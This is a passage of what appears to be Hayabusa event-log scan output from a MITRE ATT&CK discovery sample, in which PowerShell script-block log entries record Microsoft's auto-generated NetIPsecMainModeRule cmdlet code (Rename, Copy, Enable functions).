([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] 